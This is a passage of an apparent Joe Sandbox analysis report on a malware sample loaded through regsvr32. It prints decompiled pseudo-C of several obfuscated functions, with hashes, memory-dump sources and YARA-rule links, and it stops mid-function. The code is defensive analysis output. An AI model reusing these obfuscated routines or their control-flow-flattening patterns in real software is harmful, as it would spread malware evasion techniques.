                                                                                                                • String ID: Si
                                                                                                                • API String ID: 0-3544519720
                                                                                                                • Opcode ID: 278147f5c3bf1fb876cbd81278b4c6a324d2545211b611b3f3f851bcff42cebc
                                                                                                                • Instruction ID: d62d4a507c7e5a8ee33c083af8230dec15027acd06d98393f2031ef07d9f1d59
                                                                                                                • Opcode Fuzzy Hash: 278147f5c3bf1fb876cbd81278b4c6a324d2545211b611b3f3f851bcff42cebc
                                                                                                                • Instruction Fuzzy Hash: C84156B51083469FCB18CF60859646FBBE5FBD5748F004A1EF58AA6221D7B1CA09CF87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001C23B9 Relevance: 1.4, Strings: 1, Instructions: 103COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E001C23B9(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				unsigned int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t84;
				void* _t87;
				void* _t89;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				void* _t107;
				signed int* _t109;

				_t109 =  &_v44;
				_v16 = 0xd6b566;
				asm("stosd");
				_t87 = __ecx;
				_t107 = 0;
				_t89 = 0xd0c0070;
				asm("stosd");
				asm("stosd");
				_v20 = 0x51f356;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x000bea3b;
				_v28 = 0xb4b0c6;
				_t103 = 0x2a;
				_v28 = _v28 / _t103;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x00092717;
				_v32 = 0xc38ea6;
				_v32 = _v32 ^ 0x4c78f67b;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0xdbc3fa1d;
				_v36 = 0xf191c1;
				_v36 = _v36 >> 3;
				_v36 = _v36 ^ 0x7f757a64;
				_v36 = _v36 ^ 0x7f6a41e3;
				_v40 = 0xf711a2;
				_v40 = _v40 + 0xffff7538;
				_v40 = _v40 + 0xffff1292;
				_v40 = _v40 ^ 0x00f55378;
				_v24 = 0xe9ba00;
				_v24 = _v24 | 0x98b47929;
				_t104 = 0x44;
				_v24 = _v24 / _t104;
				_v24 = _v24 ^ 0x023fe814;
				_v44 = 0x22d2ba;
				_t105 = 0x39;
				_v44 = _v44 / _t105;
				_v44 = _v44 ^ 0xdb6b95f9;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x006e8ae5;
				do {
					while(_t89 != 0xc202caf) {
						if(_t89 == 0xd0c0070) {
							_t89 = 0xd2d5b5d;
							continue;
						} else {
							if(_t89 == 0xd2d5b5d) {
								_push(_t89);
								_push(_t89);
								_t84 = E001BED77();
								_t109 =  &(_t109[2]);
								_t89 = 0xdacd8f7;
								_t107 = _t107 + _t84;
								continue;
							} else {
								if(_t89 == 0xdacd8f7) {
									_t107 = _t107 + E001ABF8B(_v36, _t87 + 0x14, _v40);
									_t89 = 0xc202caf;
									continue;
								}
							}
						}
						goto L9;
					}
					_t107 = _t107 + E001ABF8B(_v24, _t87 + 0xc, _v44);
					_t89 = 0x2d1b9a;
					L9:
				} while (_t89 != 0x2d1b9a);
				return _t107;
			}




















                                                                                                                0x001c23b9
                                                                                                                0x001c23bc
                                                                                                                0x001c23d0
                                                                                                                0x001c23d1
                                                                                                                0x001c23d5
                                                                                                                0x001c23d7
                                                                                                                0x001c23e1
                                                                                                                0x001c23e2
                                                                                                                0x001c23e3
                                                                                                                0x001c23eb
                                                                                                                0x001c23f0
                                                                                                                0x001c23f8
                                                                                                                0x001c2404
                                                                                                                0x001c2409
                                                                                                                0x001c240f
                                                                                                                0x001c2413
                                                                                                                0x001c241b
                                                                                                                0x001c2423
                                                                                                                0x001c242b
                                                                                                                0x001c2430
                                                                                                                0x001c2438
                                                                                                                0x001c2440
                                                                                                                0x001c2445
                                                                                                                0x001c244d
                                                                                                                0x001c2455
                                                                                                                0x001c245d
                                                                                                                0x001c2465
                                                                                                                0x001c246d
                                                                                                                0x001c2475
                                                                                                                0x001c247d
                                                                                                                0x001c2489
                                                                                                                0x001c248e
                                                                                                                0x001c2494
                                                                                                                0x001c249c
                                                                                                                0x001c24a8
                                                                                                                0x001c24b0
                                                                                                                0x001c24b4
                                                                                                                0x001c24bc
                                                                                                                0x001c24c1
                                                                                                                0x001c24c9
                                                                                                                0x001c24c9
                                                                                                                0x001c24d3
                                                                                                                0x001c2517
                                                                                                                0x00000000
                                                                                                                0x001c24d5
                                                                                                                0x001c24d7
                                                                                                                0x001c2504
                                                                                                                0x001c2505
                                                                                                                0x001c2506
                                                                                                                0x001c250b
                                                                                                                0x001c250e
                                                                                                                0x001c2513
                                                                                                                0x00000000
                                                                                                                0x001c24d9
                                                                                                                0x001c24df
                                                                                                                0x001c24f2
                                                                                                                0x001c24f4
                                                                                                                0x00000000
                                                                                                                0x001c24f4
                                                                                                                0x001c24df
                                                                                                                0x001c24d7
                                                                                                                0x00000000
                                                                                                                0x001c24d3
                                                                                                                0x001c252c
                                                                                                                0x001c252e
                                                                                                                0x001c2533
                                                                                                                0x001c2533
                                                                                                                0x001c2544

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ][-
                                                                                                                • API String ID: 0-642903904
                                                                                                                • Opcode ID: 12d6bf39a696b811b87ec668ef6ee674d6c4fe829f873bdf6dd9df4a1cb0bc10
                                                                                                                • Instruction ID: 9ef8d10d87aee9406daf5690864373221c069cc5b3a20fd274c3fd767f01e66a
                                                                                                                • Opcode Fuzzy Hash: 12d6bf39a696b811b87ec668ef6ee674d6c4fe829f873bdf6dd9df4a1cb0bc10
                                                                                                                • Instruction Fuzzy Hash: E7418A716083019FD708CF29E44582FBBE1FBD8758F144A1EE59AA7264D3B1CA49CB93
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BF9AF Relevance: 1.3, Strings: 1, Instructions: 77COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001BF9AF(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t58;
				signed int _t61;
				signed int _t62;
				void* _t64;
				void* _t73;
				void* _t74;
				signed int* _t76;

				_t64 = __ecx;
				_t76 =  &_v20;
				_v16 = 0x4af276;
				_v16 = _v16 ^ 0xecc34d8f;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0x4f8e;
				_v16 = _v16 ^ 0x22759259;
				_v20 = 0xccfddb;
				_v20 = _v20 + 0xfffffe7c;
				_v20 = _v20 << 6;
				_t61 = 0x7d;
				_v20 = _v20 / _t61;
				_t73 = 0;
				_v20 = _v20 ^ 0x00634dbd;
				_t74 = 0x62a02c8;
				_v8 = 0xdb6cf6;
				_v8 = _v8 << 7;
				_t62 = 0x17;
				_v8 = _v8 / _t62;
				_v8 = _v8 ^ 0x04cdce71;
				_v4 = 0xe45409;
				_v4 = _v4 | 0xa3566518;
				_v4 = _v4 ^ 0x84b40a6a;
				_v4 = _v4 ^ 0x27428edb;
				_v12 = 0xd682bf;
				_v12 = _v12 * 0x66;
				_v12 = _v12 + 0xffff849f;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x000a91c3;
				do {
					while(_t74 != 0x62a02c8) {
						if(_t74 == 0x6fac46b) {
							_push(_t64);
							_push(_t64);
							_t58 = E001BED77();
							_t76 =  &(_t76[2]);
							_t74 = 0xb6c07ca;
							_t73 = _t73 + _t58;
							continue;
						} else {
							if(_t74 != 0xb6c07ca) {
								goto L8;
							} else {
								_t73 = _t73 + E001ABF8B(_v4, _t64 + 4, _v12);
							}
						}
						L5:
						return _t73;
					}
					_t74 = 0x6fac46b;
					L8:
				} while (_t74 != 0x216dadc);
				goto L5;
			}















                                                                                                                0x001bf9af
                                                                                                                0x001bf9af
                                                                                                                0x001bf9b2
                                                                                                                0x001bf9bc
                                                                                                                0x001bf9c4
                                                                                                                0x001bf9c9
                                                                                                                0x001bf9d1
                                                                                                                0x001bf9d9
                                                                                                                0x001bf9e0
                                                                                                                0x001bf9e7
                                                                                                                0x001bf9f4
                                                                                                                0x001bf9fe
                                                                                                                0x001bfa02
                                                                                                                0x001bfa04
                                                                                                                0x001bfa0c
                                                                                                                0x001bfa0e
                                                                                                                0x001bfa16
                                                                                                                0x001bfa21
                                                                                                                0x001bfa2e
                                                                                                                0x001bfa32
                                                                                                                0x001bfa3a
                                                                                                                0x001bfa42
                                                                                                                0x001bfa4a
                                                                                                                0x001bfa52
                                                                                                                0x001bfa5a
                                                                                                                0x001bfa67
                                                                                                                0x001bfa6b
                                                                                                                0x001bfa73
                                                                                                                0x001bfa78
                                                                                                                0x001bfa80
                                                                                                                0x001bfa80
                                                                                                                0x001bfa86
                                                                                                                0x001bfab5
                                                                                                                0x001bfab6
                                                                                                                0x001bfab7
                                                                                                                0x001bfabc
                                                                                                                0x001bfabf
                                                                                                                0x001bfac1
                                                                                                                0x00000000
                                                                                                                0x001bfa88
                                                                                                                0x001bfa8a
                                                                                                                0x00000000
                                                                                                                0x001bfa8c
                                                                                                                0x001bfa9d
                                                                                                                0x001bfa9d
                                                                                                                0x001bfa8a
                                                                                                                0x001bfa9f
                                                                                                                0x001bfaa8
                                                                                                                0x001bfaa8
                                                                                                                0x001bfac5
                                                                                                                0x001bfac7
                                                                                                                0x001bfac7
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: T
                                                                                                                • API String ID: 0-4218349378
                                                                                                                • Opcode ID: 5cbdb13f17435192ceeabd7ce887680e0570211b9ea0a79361a8cac6a7ca349d
                                                                                                                • Instruction ID: 88ef52b3e91304a61335b837dd6dfca104e14084aa0b87e25f24f977a89e8057
                                                                                                                • Opcode Fuzzy Hash: 5cbdb13f17435192ceeabd7ce887680e0570211b9ea0a79361a8cac6a7ca349d
                                                                                                                • Instruction Fuzzy Hash: D731CEB25083029FC318DF29C88545BFBE1FBD4754F118A2DE8E997211D3759A0ACF92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A186B Relevance: 1.3, Strings: 1, Instructions: 74COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E001A186B(signed int __eax, signed int __ecx, void* __edi, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, char _a72) {
				void* _t77;
				void* _t82;
				void* _t85;
				intOrPtr _t98;
				void* _t102;
				void* _t103;

				L0:
				while(1) {
					L0:
					_t96 = __edi;
					_t84 = __ecx;
					_t71 = __eax;
					asm("xlatb");
					asm("cmpsb");
					_t71 = __ecx;
					_t84 = __eax | 0x471ddfbd;
					asm("sbb dl, [esi-0x60]");
					asm("invalid");
					L2:
					_t96 = __edi - 1;
					asm("fbstp tword [esi-0x617bd79c]");
					goto 0x81ba;
					 *((char*)(_t96 + 0x30d31d4c)) = __ecx;
					asm("aas");
					_push( *((intOrPtr*)(_t84 - 0x73)));
					asm("salc");
					asm("fcomp3 st2");
					if (_t96 < 0) goto L1;
				}
				asm("out 0x3d, al");
				 *__eax =  *__eax + __eax;
				_push(_t82);
				_push(__ecx);
				E001AC98A(_t71);
				_a56 = 0xb27d2c;
				_t98 = 0;
				_a60 = 0xea864d;
				_t103 = _t102 + 0x10;
				_a64 = 0x1f2dab;
				_t85 = 0x3ac7409;
				_a68 = 0;
				_a40 = 0x191778;
				_a40 = _a40 | 0xa20a80f7;
				_a40 = _a40 ^ 0xa216246b;
				_a32 = 0xa964d4;
				_a32 = _a32 + 0x8b05;
				_a32 = _a32 + 0xffff7529;
				_a32 = _a32 ^ 0x00ad9bce;
				_a28 = 0x46ba3c;
				_a28 = _a28 | 0xb6256e3b;
				_a28 = _a28 * 0x21;
				_a28 = _a28 ^ 0x8361d7ca;
				_a44 = 0x81c27d;
				_a44 = _a44 * 0x68;
				_a44 = _a44 ^ 0x34bbe2dd;
				_a36 = 0xcb4588;
				_a36 = _a36 + 0x9f78;
				_a36 = _a36 >> 0xd;
				_a36 = _a36 ^ 0x0003c6e6;
				_a24 = 0x8ce280;
				_a24 = _a24 ^ 0x62397b6a;
				_a24 = _a24 ^ 0x5c51708f;
				_a24 = _a24 ^ 0x0d69e953;
				_a24 = _a24 ^ 0x338347c6;
				_a52 = 0x92c06b;
				_a52 = _a52 ^ 0x00901884;
				_a48 = 0xe644d6;
				_a48 = _a48 << 0xd;
				_a48 = _a48 ^ 0xc899afdb;
				do {
					while(_t85 != 0x274709f) {
						if(_t85 == 0x3ac7409) {
							_t85 = 0x3eb1887;
							continue;
						} else {
							if(_t85 == 0x3eb1887) {
								E001A6DD9( &_a72, _a40, _a32, _t82, _a28);
								_t103 = _t103 + 0xc;
								_t85 = 0x274709f;
								continue;
							} else {
								_t110 = _t85 - 0xa1a2c51;
								if(_t85 != 0xa1a2c51) {
									goto L16;
								} else {
									E001AA903(_a52, _t96 + 0x20, _t110, _a48,  &_a72);
									_t98 =  !=  ? 1 : _t98;
								}
							}
						}
						L10:
						return _t98;
					}
					_t77 = E001B6D3A( &_a72, _t96 + 0x1c, _a44, _a36, _a24);
					_t103 = _t103 + 0xc;
					__eflags = _t77;
					if(__eflags == 0) {
						_t85 = 0x38dd9d8;
						goto L16;
					} else {
						_t85 = 0xa1a2c51;
						continue;
					}
					goto L10;
					L16:
					__eflags = _t85 - 0x38dd9d8;
				} while (__eflags != 0);
				goto L10;
			}









                                                                                                                0x001a186b
                                                                                                                0x001a186b
                                                                                                                0x001a186b
                                                                                                                0x001a186b
                                                                                                                0x001a186b
                                                                                                                0x001a186b
                                                                                                                0x001a186b
                                                                                                                0x001a1848
                                                                                                                0x001a1849
                                                                                                                0x001a1849
                                                                                                                0x001a184a
                                                                                                                0x001a184d
                                                                                                                0x001a184f
                                                                                                                0x001a184f
                                                                                                                0x001a1850
                                                                                                                0x001a1856
                                                                                                                0x001a185d
                                                                                                                0x001a1863
                                                                                                                0x001a1864
                                                                                                                0x001a1867
                                                                                                                0x001a1868
                                                                                                                0x001a186a
                                                                                                                0x001a186a
                                                                                                                0x001a186c
                                                                                                                0x001a18a2
                                                                                                                0x001a18a4
                                                                                                                0x001a18a5
                                                                                                                0x001a18a6
                                                                                                                0x001a18ab
                                                                                                                0x001a18b3
                                                                                                                0x001a18b5
                                                                                                                0x001a18bd
                                                                                                                0x001a18c0
                                                                                                                0x001a18c8
                                                                                                                0x001a18cd
                                                                                                                0x001a18d6
                                                                                                                0x001a18de
                                                                                                                0x001a18e6
                                                                                                                0x001a18ee
                                                                                                                0x001a18f6
                                                                                                                0x001a18fe
                                                                                                                0x001a1906
                                                                                                                0x001a190e
                                                                                                                0x001a1916
                                                                                                                0x001a1923
                                                                                                                0x001a1927
                                                                                                                0x001a192f
                                                                                                                0x001a193c
                                                                                                                0x001a1940
                                                                                                                0x001a1948
                                                                                                                0x001a1950
                                                                                                                0x001a1958
                                                                                                                0x001a195d
                                                                                                                0x001a1965
                                                                                                                0x001a196d
                                                                                                                0x001a1975
                                                                                                                0x001a197d
                                                                                                                0x001a1985
                                                                                                                0x001a198d
                                                                                                                0x001a199d
                                                                                                                0x001a19a5
                                                                                                                0x001a19ad
                                                                                                                0x001a19b2
                                                                                                                0x001a19ba
                                                                                                                0x001a19ba
                                                                                                                0x001a19c8
                                                                                                                0x001a1a1f
                                                                                                                0x00000000
                                                                                                                0x001a19ca
                                                                                                                0x001a19cc
                                                                                                                0x001a1a10
                                                                                                                0x001a1a15
                                                                                                                0x001a1a18
                                                                                                                0x00000000
                                                                                                                0x001a19ce
                                                                                                                0x001a19ce
                                                                                                                0x001a19d4
                                                                                                                0x00000000
                                                                                                                0x001a19d6
                                                                                                                0x001a19e6
                                                                                                                0x001a19f2
                                                                                                                0x001a19f2
                                                                                                                0x001a19d4
                                                                                                                0x001a19cc
                                                                                                                0x001a19f5
                                                                                                                0x001a19fe
                                                                                                                0x001a19fe
                                                                                                                0x001a1a36
                                                                                                                0x001a1a3b
                                                                                                                0x001a1a3e
                                                                                                                0x001a1a40
                                                                                                                0x001a1a4c
                                                                                                                0x00000000
                                                                                                                0x001a1a42
                                                                                                                0x001a1a42
                                                                                                                0x00000000
                                                                                                                0x001a1a42
                                                                                                                0x00000000
                                                                                                                0x001a1a51
                                                                                                                0x001a1a51
                                                                                                                0x001a1a51
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Si
                                                                                                                • API String ID: 0-3544519720
                                                                                                                • Opcode ID: 772288a6c65f622235bba70c83a109ef0ccd7a2ca8f4960e84c22babaf34fb0b
                                                                                                                • Instruction ID: 6ae59a930668dfc30e67cb4df43a31b3b97922fc7fbdcfa0b2bb061f7b73d05c
                                                                                                                • Opcode Fuzzy Hash: 772288a6c65f622235bba70c83a109ef0ccd7a2ca8f4960e84c22babaf34fb0b
                                                                                                                • Instruction Fuzzy Hash: C73157B64093428FC718CF60859A02FFBE4FF95758F004A0EF196A6121D7B0CA098F87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A2F36 Relevance: 1.3, Strings: 1, Instructions: 72COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E001A2F36(void* __ecx, unsigned int __edx) {
				void* _t41;
				unsigned int _t45;
				unsigned int _t48;
				signed int _t53;
				unsigned int* _t57;
				unsigned int _t60;
				char* _t61;
				unsigned int _t62;
				void* _t63;
				signed int _t65;
				void* _t67;
				void* _t68;

				_t61 =  *((intOrPtr*)(_t67 + 0x24));
				_t62 = __edx;
				_push(_t61);
				_push( *((intOrPtr*)(_t67 + 0x24)));
				_push( *((intOrPtr*)(_t67 + 0x24)));
				_push(__edx);
				E001AC98A(_t41);
				 *(_t67 + 0x38) = 0xce6a6d;
				 *(_t67 + 0x38) =  *(_t67 + 0x38) ^ 0x9f0168be;
				_t68 = _t67 + 0x14;
				 *(_t68 + 0x24) =  *(_t68 + 0x24) << 0xa;
				 *(_t68 + 0x24) =  *(_t68 + 0x24) ^ 0xbbc1154a;
				 *(_t68 + 0x24) =  *(_t68 + 0x24) ^ 0x87c82040;
				 *(_t68 + 0x14) = 0xe19b4b;
				 *(_t68 + 0x14) =  *(_t68 + 0x14) | 0x68a41fb6;
				 *(_t68 + 0x14) =  *(_t68 + 0x14) ^ 0x68e987ef;
				 *(_t68 + 0x10) = 0xe75e04;
				 *(_t68 + 0x10) =  *(_t68 + 0x10) + 0xecfe;
				_t53 = __edx >> 2;
				 *(_t68 + 0x10) =  *(_t68 + 0x10) * 0x26;
				 *(_t68 + 0x10) =  *(_t68 + 0x10) >> 7;
				 *(_t68 + 0x10) =  *(_t68 + 0x10) ^ 0x0045e97a;
				 *(_t68 + 0xc) = 0x2a40c4;
				 *(_t68 + 0xc) =  *(_t68 + 0xc) | 0x2c657b96;
				 *(_t68 + 0xc) =  *(_t68 + 0xc) << 4;
				 *(_t68 + 0xc) =  *(_t68 + 0xc) << 4;
				 *(_t68 + 0xc) =  *(_t68 + 0xc) ^ 0x6f77ff1f;
				if(_t53 != 0) {
					_t65 = _t53;
					do {
						 *_t61 = E001B25AA();
						_t61 = _t61 + 4;
						_t65 = _t65 - 1;
					} while (_t65 != 0);
				}
				_t45 = _t53 << 2;
				_t63 = _t62 - _t45;
				if(_t63 != 0) {
					_t45 = E001B25AA();
					_t60 = _t45 >> 0x10;
					 *_t61 = _t60 >> 8;
					_t57 = _t61 + 1;
					if(_t63 > 1) {
						 *_t57 = _t60;
						_t57 =  &(_t57[0]);
					}
					if(_t63 > 2) {
						_t48 = _t45 >> 8;
						 *_t57 = _t48;
						return _t48;
					}
				}
				return _t45;
			}















                                                                                                                0x001a2f3c
                                                                                                                0x001a2f40
                                                                                                                0x001a2f42
                                                                                                                0x001a2f43
                                                                                                                0x001a2f47
                                                                                                                0x001a2f4b
                                                                                                                0x001a2f4d
                                                                                                                0x001a2f52
                                                                                                                0x001a2f5c
                                                                                                                0x001a2f64
                                                                                                                0x001a2f67
                                                                                                                0x001a2f6c
                                                                                                                0x001a2f74
                                                                                                                0x001a2f7c
                                                                                                                0x001a2f84
                                                                                                                0x001a2f8c
                                                                                                                0x001a2f94
                                                                                                                0x001a2f9c
                                                                                                                0x001a2fa9
                                                                                                                0x001a2fac
                                                                                                                0x001a2fb0
                                                                                                                0x001a2fb5
                                                                                                                0x001a2fbd
                                                                                                                0x001a2fc5
                                                                                                                0x001a2fcd
                                                                                                                0x001a2fd2
                                                                                                                0x001a2fd7
                                                                                                                0x001a2fe1
                                                                                                                0x001a2fe4
                                                                                                                0x001a2fe6
                                                                                                                0x001a2ff3
                                                                                                                0x001a2ff5
                                                                                                                0x001a2ff8
                                                                                                                0x001a2ff8
                                                                                                                0x001a2ffb
                                                                                                                0x001a2ffe
                                                                                                                0x001a3001
                                                                                                                0x001a3003
                                                                                                                0x001a300d
                                                                                                                0x001a3014
                                                                                                                0x001a301c
                                                                                                                0x001a301e
                                                                                                                0x001a3024
                                                                                                                0x001a3026
                                                                                                                0x001a3028
                                                                                                                0x001a3028
                                                                                                                0x001a302c
                                                                                                                0x001a302e
                                                                                                                0x001a3031
                                                                                                                0x00000000
                                                                                                                0x001a3031
                                                                                                                0x001a302c
                                                                                                                0x001a3039

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: zE
                                                                                                                • API String ID: 0-1652785882
                                                                                                                • Opcode ID: b641ca8c5750b17f19e4ec43b43a65263363f4c16b8fb94a6cd6cfed2e7dd6fd
                                                                                                                • Instruction ID: e3f3590ed1b6efce870153ff7978aa5c2d0394194afb8dcce5f112e78e2b0d37
                                                                                                                • Opcode Fuzzy Hash: b641ca8c5750b17f19e4ec43b43a65263363f4c16b8fb94a6cd6cfed2e7dd6fd
                                                                                                                • Instruction Fuzzy Hash: 1821CC714083429FC314DF26C58A44FFBE0FAD1758F408A6CF4AAA6221C7B5DA19CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001ACA3C Relevance: 1.3, Strings: 1, Instructions: 49COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001ACA3C() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t60;
				signed int _t61;

				_v32 = _v32 & 0x00000000;
				_v40 = 0x3bb39;
				_v36 = 0xb7ef55;
				_v8 = 0xb69831;
				_v8 = _v8 >> 6;
				_t60 = 9;
				_v8 = _v8 / _t60;
				_v8 = _v8 + 0x7244;
				_v8 = _v8 ^ 0x0000c36b;
				_v24 = 0xe9606f;
				_v24 = _v24 ^ 0x59c12290;
				_v24 = _v24 ^ 0x592227a0;
				_v20 = 0xc896cb;
				_v20 = _v20 ^ 0xb54477d0;
				_v20 = _v20 ^ 0xb58f3dc2;
				_v16 = 0x15a03a;
				_t61 = 0x3e;
				_v16 = _v16 / _t61;
				_v16 = _v16 ^ 0x00037a08;
				_v12 = 0xc0d420;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 | 0x5060fa95;
				_v12 = _v12 ^ 0x50607b06;
				_push(_v12);
				_v28 = _v8;
				E001B86EE(_v20,  &_v28, _v16, _t61);
				return _v28;
			}














                                                                                                                0x001aca42
                                                                                                                0x001aca48
                                                                                                                0x001aca4f
                                                                                                                0x001aca56
                                                                                                                0x001aca5d
                                                                                                                0x001aca66
                                                                                                                0x001aca6b
                                                                                                                0x001aca70
                                                                                                                0x001aca77
                                                                                                                0x001aca7e
                                                                                                                0x001aca85
                                                                                                                0x001aca8c
                                                                                                                0x001aca93
                                                                                                                0x001aca9a
                                                                                                                0x001acaa1
                                                                                                                0x001acaa8
                                                                                                                0x001acab2
                                                                                                                0x001acab5
                                                                                                                0x001acab8
                                                                                                                0x001acabf
                                                                                                                0x001acac6
                                                                                                                0x001acaca
                                                                                                                0x001acad1
                                                                                                                0x001acadb
                                                                                                                0x001acade
                                                                                                                0x001acaef
                                                                                                                0x001acafd

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: o`
                                                                                                                • API String ID: 0-2455046745
                                                                                                                • Opcode ID: 2d71cbd1b263e8fc0cf64166de4a08ed7d43f85a706d30546d994ae3fdd29e7e
                                                                                                                • Instruction ID: 39842ef83c5acf5928eacc5310e3d0116f84a6a6e166ff324a0476c677e9d079
                                                                                                                • Opcode Fuzzy Hash: 2d71cbd1b263e8fc0cf64166de4a08ed7d43f85a706d30546d994ae3fdd29e7e
                                                                                                                • Instruction Fuzzy Hash: 1821DE71D01209EBDF08CFE0CA4A5AEFBB5EB44708F20818AD115A6240DBB51B45DB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003E709 Relevance: .4, Instructions: 384COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003E709(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
